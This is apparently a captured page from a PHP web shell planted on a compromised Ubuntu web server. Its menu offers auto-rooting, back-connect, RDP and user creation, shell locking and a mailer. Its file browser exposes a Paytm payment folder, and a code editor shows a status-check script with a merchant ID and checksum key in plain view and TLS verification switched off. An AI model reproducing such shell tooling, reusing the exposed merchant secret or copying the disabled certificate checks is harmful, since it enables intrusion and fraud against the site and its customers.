Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.145.161.199
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
kus /
adm /
Paytm /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-xr-x
.DS_Store
8
KB
-rwxr-xr-x
CHECK_TxnStatuss.php
1.53
KB
-rwxr-xr-x
TxnStatus.php
2.11
KB
-rwxr-xr-x
TxnTest.php
1.75
KB
-rwxr-xr-x
pgRedirect.php
6.47
KB
-rwxr-xr-x
pgRedirect_29112019.php
3.85
KB
-rwxr-xr-x
pgResponse.php
10.48
KB
-rwxr-xr-x
pgResponse_new.php
3.73
KB
-rwxr-xr-x
pgResponse_old.php
2.09
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CHECK_TxnStatuss.php
<?php header("Pragma: no-cache"); header("Cache-Control: no-cache"); header("Expires: 0"); // following files need to be included //require_once("./lib/config_paytm.php"); require_once("./lib/encdec_paytm.php"); $ORDER_ID = ""; $requestParamList = array(); $responseParamList = array(); $requestParamList = array("MID" => "Unicla48931199835971" , "ORDERID" => "14187307"); $checkSum = getChecksumFromArray($requestParamList,"NYvcn5jnUPIpRHQR"); $requestParamList['CHECKSUMHASH'] = urlencode($checkSum); $data_string = "JsonData=".json_encode($requestParamList); echo $data_string; $ch = curl_init(); // initiate curl //$url = PAYTM_STATUS_QUERY_URL; //Live server where you want to post data $url = "https://securegw-stage.paytm.in/merchant-status/getTxnStatus?"; //staging server //$url = "https://securegw.paytm.in/merchant-status/getTxnStatus?"; // Live server curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_POST, true); // tell curl you want to post something curl_setopt($ch, CURLOPT_POSTFIELDS,$data_string); // define what you want to post curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // return the output in string format $headers = array(); $headers[] = 'Content-Type: application/json'; curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); $output = curl_exec($ch); // execute $info = curl_getinfo($ch); //echo "kkk".$output; $data = json_decode($output, true); echo "<pre>"; print_r($data); echo "</pre>"; ?>
Close